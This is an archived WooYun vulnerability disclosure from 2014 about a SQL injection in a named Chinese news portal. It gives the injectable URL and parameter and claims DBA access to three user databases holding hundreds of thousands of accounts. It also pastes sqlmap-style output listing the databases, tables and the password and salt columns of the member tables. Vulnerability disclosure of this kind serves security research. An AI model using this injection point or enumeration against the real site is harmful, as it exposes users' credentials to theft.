乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-10-23: 积极联系厂商并且等待厂商认领中,细节不对外公开 2014-12-07: 厂商已经主动忽略漏洞,细节向公众公开
某大型新闻门户高危SQL注射 # 全库泄露,数据告急
黄海在线,滨海第一新媒体门户1、ucenter表35万用户账号密码邮箱等泄露2、phpcms表12万用户账号密码等资料泄露3、phpwind表5000多用户账号密码泄露4、dba权限注射地址:
http://www.zghhzx.com.cn/index.php?m=content&c=index&a=show&catid=125&id=5
available databases [7]:[*] bh_phpcms[*] bh_phpwind[*] bh_ucenter[*] information_schema[*] mysql[*] performance_schema[*] testDatabase: bh_phpcms[172 tables]+---------------------------+| pw_activitymembers || v9_admin || v9_admin_panel || v9_admin_role || v9_admin_role_priv || v9_announce || v9_ask || v9_ask_data || v9_attachment || v9_attachment_index || v9_badword || v9_block || v9_block_history || v9_block_priv || v9_cache || v9_category || v9_category_priv || v9_collection_content || v9_collection_history || v9_collection_node || v9_collection_program || v9_comment || v9_comment_check || v9_comment_data_1 || v9_comment_setting || v9_comment_table || v9_content_check || v9_copyfrom || v9_datacall || v9_dbsource || v9_download || v9_download_data || v9_downservers || v9_extend_setting || v9_fangyuan || v9_fangyuan_data || v9_favorite || v9_flash || v9_flash_data || v9_form_dingfang || v9_form_kanfang || v9_fuwu || v9_fuwu_data || v9_gongqiu || v9_gongqiu_data || v9_hits || v9_house || v9_house_data || v9_house_new || v9_house_new_data || v9_housesales || v9_housesales_data || v9_ipbanned || v9_jiaoyou || v9_jiaoyou_data || v9_keylink || v9_lanmu || v9_lanmu_data || v9_link || v9_linkage || v9_live || v9_live_data || v9_log || v9_loupan || v9_loupan_data || v9_lpstatus || v9_lpstatus_data || v9_lpxc || v9_lpxc_data || v9_member || v9_member_detail || v9_member_group || v9_member_menu || v9_member_verify || v9_member_vip || v9_menu || v9_message || v9_message_data || v9_message_group || v9_mobile || v9_mobile_type || v9_model || v9_model_field || v9_module || v9_mood || v9_movie || v9_movie_data || v9_mrotation || v9_mrotation_data || v9_news || v9_news_data || v9_page || v9_pay_account || v9_pay_payment || v9_pay_spend || v9_picture || v9_picture_data || v9_player || v9_plugin || v9_plugin_var || v9_position || v9_position_data || v9_poster || v9_poster_201209 || v9_poster_201210 || v9_poster_201211 || v9_poster_201212 || v9_poster_201301 || v9_poster_201302 || v9_poster_201303 || v9_poster_201304 || v9_poster_201305 || v9_poster_201306 || v9_poster_201307 || v9_poster_201308 || v9_poster_201309 || v9_poster_201310 || v9_poster_201311 || v9_poster_201312 || v9_poster_201401 || v9_poster_201402 || v9_poster_201403 || v9_poster_201404 || v9_poster_201405 || v9_poster_201406 || v9_poster_201407 || v9_poster_201408 || v9_poster_201409 || v9_poster_201410 || v9_poster_space || v9_qiuzhi || v9_qiuzhi_data || v9_queue || v9_release_point || v9_replay || v9_replay_data || v9_search || v9_search_keyword || v9_session || v9_site || v9_sms_report || v9_special || v9_special_c_data || v9_special_content || v9_sphinx_counter || v9_sso_admin || v9_sso_applications || v9_sso_members || v9_sso_messagequeue || v9_sso_session || v9_sso_settings || v9_tag || v9_template_bak || v9_times || v9_trend || v9_trend_data || v9_type || v9_urlrule || v9_video || v9_video_data || v9_videoconversionresults || v9_videoconversiontasks || v9_vote_data || v9_vote_option || v9_vote_subject || v9_wap || v9_wap_type || v9_workflow || v9_zhaopin || v9_zhaopin_data || v9_zhuchiren || v9_zhuchiren_data |+---------------------------+Database: bh_phpcmsTable: v9_member[24 columns]+-------------+-----------------------+| Column | Type |+-------------+-----------------------+| from | char(10) || amount | decimal(8,2) unsigned || areaid | smallint(5) unsigned || connectid | char(15) || email | char(32) || encrypt | char(6) || groupid | tinyint(3) unsigned || islock | tinyint(1) unsigned || lastdate | int(10) unsigned || lastip | char(15) || loginnum | smallint(5) unsigned || message | tinyint(1) unsigned || modelid | smallint(5) unsigned || nickname | char(20) || overduedate | int(10) unsigned || password | char(32) || phpssouid | mediumint(8) unsigned || point | smallint(5) unsigned || regdate | int(10) unsigned || regip | char(15) || siteid | smallint(5) unsigned || userid | mediumint(8) unsigned || username | char(30) || vip | tinyint(1) unsigned |+-------------+-----------------------+
Database: bh_ucenter[19 tables]+---------------------+| uc_admins || uc_applications || uc_badwords || uc_domains || uc_failedlogins || uc_feeds || uc_friends || uc_mailqueue || uc_memberfields || uc_members || uc_mergemembers || uc_newpm || uc_notelist || uc_pms || uc_protectedmembers || uc_settings || uc_sqlcache || uc_tags || uc_vars |+---------------------+Database: bh_ucenterTable: uc_members[12 columns]+---------------+-----------------------+| Column | Type |+---------------+-----------------------+| email | char(32) || lastloginip | int(10) || lastlogintime | int(10) unsigned || myid | char(30) || myidkey | char(16) || password | char(32) || regdate | int(10) unsigned || regip | char(15) || salt | char(6) || secques | char(8) || uid | mediumint(8) unsigned || username | char(30) |+---------------+-----------------------+
Database: bh_phpwind[279 tables]+------------------------------+| pw_actattachs || pw_actions || pw_active || pw_activity || pw_activitycate || pw_activitydefaultvalue || pw_activityfield || pw_activitymembers || pw_activitymodel || pw_activitypaylog || pw_activityvalue1 || pw_activityvalue10 || pw_activityvalue11 || pw_activityvalue12 || pw_activityvalue13 || pw_activityvalue14 || pw_activityvalue15 || pw_activityvalue16 || pw_activityvalue17 || pw_activityvalue2 || pw_activityvalue3 || pw_activityvalue4 || pw_activityvalue5 || pw_activityvalue6 || pw_activityvalue7 || pw_activityvalue8 || pw_activityvalue9 || pw_actmember || pw_actmembers || pw_administrators || pw_adminlog || pw_adminset || pw_advert || pw_announce || pw_area_level || pw_areas || pw_argument || pw_attachbuy || pw_attachdownload || pw_attachs || pw_attention || pw_attention_blacklist || pw_auth_certificate || pw_ban || pw_banuser || pw_bbsinfo || pw_buyadvert || pw_cache || pw_cache_distribute || pw_cache_members || pw_cachedata || pw_channel || pw_clientorder || pw_cmembers || pw_cms_article || pw_cms_articlecontent || pw_cms_articleextend || pw_cms_attach || pw_cms_column || pw_cms_comment || pw_cms_commentreply || pw_cms_purview || pw_cnalbum || pw_cnclass || pw_cnlevel || pw_cnphoto || pw_cnskin || pw_cnstyles || pw_collection || pw_collectiontype || pw_colonys || pw_comment || pw_company || pw_config || pw_creditlog || pw_credits || pw_customfield || pw_cwritedata || pw_datanalyse || pw_datastate || pw_datastore || pw_debatedata || pw_debates || pw_delta_diarys || pw_delta_members || pw_delta_posts || pw_delta_threads || pw_diary || pw_diarytype || pw_dida_comment || pw_dida_data || pw_dida_relate || pw_dida_user || pw_draft || pw_elements || pw_extragroups || pw_favors || pw_feed || pw_filter || pw_filter_class || pw_filter_dictionary || pw_focus || pw_forumdata || pw_forumlog || pw_forummsg || pw_forums || pw_forumsell || pw_forumsextra || pw_friends || pw_friendtype || pw_group_replay || pw_hack || pw_help || pw_hits_threads || pw_invitecode || pw_inviterecord || pw_invoke || pw_invokepiece || pw_ipstates || pw_job || pw_jober || pw_kmd_info || pw_kmd_paylog || pw_kmd_spread || pw_kmd_user || pw_log_aggregate || pw_log_attachs || pw_log_colonys || pw_log_diary || pw_log_forums || pw_log_members || pw_log_postdefend || pw_log_posts || pw_log_postverify || pw_log_setting || pw_log_threads || pw_log_userdefend || pw_log_weibos || pw_medal_apply || pw_medal_award || pw_medal_info || pw_medal_log || pw_member_behavior_statistic || pw_membercredit || pw_memberdata || pw_memberinfo || pw_members || pw_membertags || pw_membertags_relations || pw_memo || pw_modehot || pw_mpageconfig || pw_ms_attachs || pw_ms_configs || pw_ms_messages || pw_ms_relations || pw_ms_replies || pw_ms_searchs || pw_ms_tasks || pw_nav || pw_oboard || pw_online || pw_online_guest || pw_online_statistics || pw_online_user || pw_ouserdata || pw_overprint || pw_owritedata || pw_pagecache || pw_pageinvoke || pw_pcfield || pw_pcmember || pw_pcvalue1 || pw_permission || pw_pidtmp || pw_pinglog || pw_plan || pw_polls || pw_portalpage || pw_postcate || pw_posts || pw_postsfloor || pw_poststopped || pw_privacy || pw_proclock || pw_pushdata || pw_pushpic || pw_rate || pw_rateconfig || pw_rateresult || pw_recycle || pw_replyreward || pw_replyrewardrecord || pw_report || pw_reward || pw_robbuild || pw_robbuildfloor || pw_schcache || pw_school || pw_searchadvert || pw_searchforum || pw_searchhotwords || pw_searchstatistic || pw_setform || pw_sharelinks || pw_sharelinksrelation || pw_sharelinkstype || pw_singleright || pw_smiles || pw_space || pw_sqlcv || pw_statistics_daily || pw_stopic || pw_stopic_comment || pw_stopic_commentreply || pw_stopicblock || pw_stopiccategory || pw_stopicpictures || pw_stopicunit || pw_styles || pw_tagdata || pw_tags || pw_task || pw_temp_keywords || pw_threads || pw_threads_at || pw_threads_img || pw_tmsgs || pw_toollog || pw_tools || pw_topiccate || pw_topicfield || pw_topicmodel || pw_topictype || pw_topicvalue1 || pw_topicvalue2 || pw_topicvalue3 || pw_topicvalue4 || pw_topicvalue5 || pw_topicvalue6 || pw_topicvalue7 || pw_topicvalue8 || pw_tpl || pw_trade || pw_tradeorder || pw_ucapp || pw_ucnotify || pw_ucsyncredit || pw_user_career || pw_user_education || pw_userapp || pw_userbinding || pw_usercache || pw_usergroups || pw_usertool || pw_voter || pw_wappush || pw_wappushtype || pw_weibo_bind || pw_weibo_cmrelations || pw_weibo_cnrelations || pw_weibo_comment || pw_weibo_content || pw_weibo_login_session || pw_weibo_login_user || pw_weibo_referto || pw_weibo_relations || pw_weibo_topicattention || pw_weibo_topicrelations || pw_weibo_topics || pw_windcode || pw_wordfb || pw_write_smiles || pw_yun_setting || tp_liuyan || tp_params || tp_toupiao || tp_type || tp_userinfo |+------------------------------+Database: bh_phpwindTable: pw_members[41 columns]+------------+----------------------+| Column | Type |+------------+----------------------+| aliww | varchar(30) || apartment | int(10) unsigned || attach | varchar(50) || authmobile | char(16) || banpm | text || bday | date || datefm | varchar(15) || email | varchar(60) || gender | tinyint(1) || groupid | tinyint(3) || groups | varchar(255) || hack | varchar(255) || home | int(10) unsigned || honor | varchar(100) || icon | varchar(255) || icq | varchar(12) || introduce | text || lastaddrst | varchar(255) || location | varchar(36) || medals | varchar(255) || memberid | tinyint(3) || msggroups | varchar(255) || msn | varchar(35) || newpm | smallint(6) unsigned || oicq | varchar(12) || p_num | tinyint(3) unsigned || password | varchar(40) || realname | varchar(16) || regdate | int(10) unsigned || safecv | varchar(10) || shortcut | varchar(255) || signature | text || site | varchar(75) || style | varchar(12) || t_num | tinyint(3) unsigned || timedf | varchar(5) || uid | int(10) unsigned || username | varchar(30) || userstatus | int(10) unsigned || yahoo | varchar(35) || yz | int(10) |+------------+----------------------+
过滤
未能联系到厂商或者厂商积极拒绝
